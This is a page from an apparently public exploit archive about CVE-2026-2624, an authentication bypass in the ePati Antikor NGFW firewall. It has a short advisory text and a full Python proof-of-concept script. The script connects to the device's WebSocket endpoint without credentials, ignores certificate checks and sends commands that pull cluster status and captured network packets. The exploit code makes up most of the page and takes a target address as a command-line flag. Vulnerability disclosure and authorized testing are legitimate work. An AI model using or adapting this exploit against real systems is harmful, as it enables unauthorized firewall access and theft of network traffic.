Skip to main content
Home/Exploits/WebApps/ePati Antikor NGFW 2.0.1301 – Authentication Bypass
EXPLOIT CRITICAL (9.1)

ePati Antikor NGFW 2.0.1301 – Authentication Bypass

CVE ID: CVE-2026-2624
Vulnerability Type: Authentication Bypass
Author: sadik
Categories: WebApps

Understanding the ePati Antikor NGFW 2.0.1301 Authentication Bypass Vulnerability

The ePati Antikor NGFW 2.0.1301 has been identified with a critical authentication bypass vulnerability, cataloged under CVE-2026-2624. This flaw allows unauthorized users to gain access to sensitive functionalities within the firewall, potentially compromising the security of the entire network infrastructure.

Technical Details

This vulnerability arises due to improper validation of authentication tokens within the ePati Antikor NGFW. By exploiting this weakness, an attacker can craft specific requests that bypass the authentication mechanisms. For instance, if an attacker sends a specially formatted HTTP request, the device may incorrectly process it, granting access to administrative features without proper credentials.

This flaw can be exploited remotely, making it particularly dangerous. Attackers can leverage automated tools to scan for vulnerable instances of the ePati Antikor NGFW, allowing them to gain unauthorized access and manipulate firewall settings or extract sensitive data.

Impact

The potential consequences of this vulnerability are severe. Unauthorized access could lead to the modification of firewall rules, enabling attackers to intercept or redirect traffic. Additionally, sensitive data could be exfiltrated, leading to data breaches and compliance violations. Organizations relying on ePati Antikor NGFW for network security must prioritize addressing this vulnerability to safeguard their assets.

Mitigation

To protect against CVE-2026-2624, organizations should immediately update their ePati Antikor NGFW to the latest version, where this vulnerability has been patched. Regularly monitoring and applying security updates is crucial for maintaining a robust security posture.

Moreover, implementing additional layers of security, such as intrusion detection systems (IDS) and strict network segmentation, can help mitigate the risks associated with this vulnerability. Conducting regular security audits and penetration testing will also assist in identifying and addressing potential weaknesses before they can be exploited.

Proof of Concept (PoC)

poc.py 
# Exploit Title: ePati Antikor NGFW 2.0.1301 -  Authentication Bypass 
# Date: 2026-04-13
# Exploit Author: [SADIK ERTÜRK]
# Vendor Homepage: https://www.epati.com.tr/
# Software Link: https://www.epati.com.tr/antikor-ngfw/
# Version: v.2.0.1298 - v.2.0.1301
# Tested on: Linux / Antikor OS
# CVE: CVE-2026-2624

import websocket
import json
import ssl
import sys
import argparse
import random
import string
import time

def banner():
    print("-" * 65)
    print(" ePati Antikor NGFW Unauthenticated WebSocket Exploit")
    print(" CVE-2026-2624 | Author: [SADIK ERTÜRK]")
    print("-" * 65)

def generate_random_id(length=8):
    """Generates a random session ID for the SockJS connection."""
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))

def exploit(target_ip, target_port):
    # Generating random server and session IDs for SockJS
    server_id = random.randint(100, 999)
    session_id = generate_random_id()
    
    ws_url = f"wss://{target_ip}:{target_port}/sock/{server_id}/{session_id}/websocket"
    print(f"[*] Target WebSocket URL created: {ws_url}")
    print("[*] Connecting to the target... (Ignoring SSL certificate warnings)")

    try:
        # Bypassing Self-Signed SSL certificate verifications
        ws = websocket.WebSocket(sslopt={"cert_reqs": ssl.CERT_NONE})
        ws.connect(ws_url)
        print("[+] Connection Successful! (Authentication bypassed)n")
        
        # Payload 1: Listening to Cluster and System Status
        payload_1 = json.dumps(["{"istekId":"req_init_01","komut":"rapor-dinle","parametreler":["cluster-durum"]}"])
        print("[*] Sending 1st payload: 'rapor-dinle' (cluster-status)...")
        ws.send(payload_1)

        # Wait for the response from the server
        time.sleep(1) 
        response_1 = ws.recv()
        
        if response_1:
            print("[+] SUCCESSFUL! Sensitive system data successfully leaked:")
            print(f"> {response_1}n")
        
        # Payload 2: Listening to Network Packets
        payload_2 = json.dumps(["{"istekId":"req_101","komut":"paket-liste-dinle","parametreler":[]}"])
        print("[*] Sending 2nd payload: 'paket-liste-dinle' (network-packet-list)...")
        ws.send(payload_2)
        
        time.sleep(1)
        response_2 = ws.recv()
        
        if response_2:
            print("[+] Network packet data captured:")
            print(f"> {response_2}n")

        print("[*] Exploitation complete. Closing connection.")
        ws.close()

    except websocket.WebSocketException as e:
        print(f"[-] WebSocket Error: {e}")
        print("[-] The target might be patched (v.2.0.1302+) or the port is closed.")
        sys.exit(1)
    except Exception as e:
        print(f"[-] An unexpected error occurred: {e}")
        sys.exit(1)

if __name__ == "__main__":
    banner()
    
    # Argument parsing
    parser = argparse.ArgumentParser(description="ePati Antikor NGFW WebSocket Auth Bypass PoC")
    parser.add_argument("-t", "--target", required=True, help="Target IP or Hostname (e.g., 192.168.1.10)")
    parser.add_argument("-p", "--port", default="8800", help="Target Port (Default: 8800)")
    
    args = parser.parse_args()
    
    exploit(args.target, args.port)

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...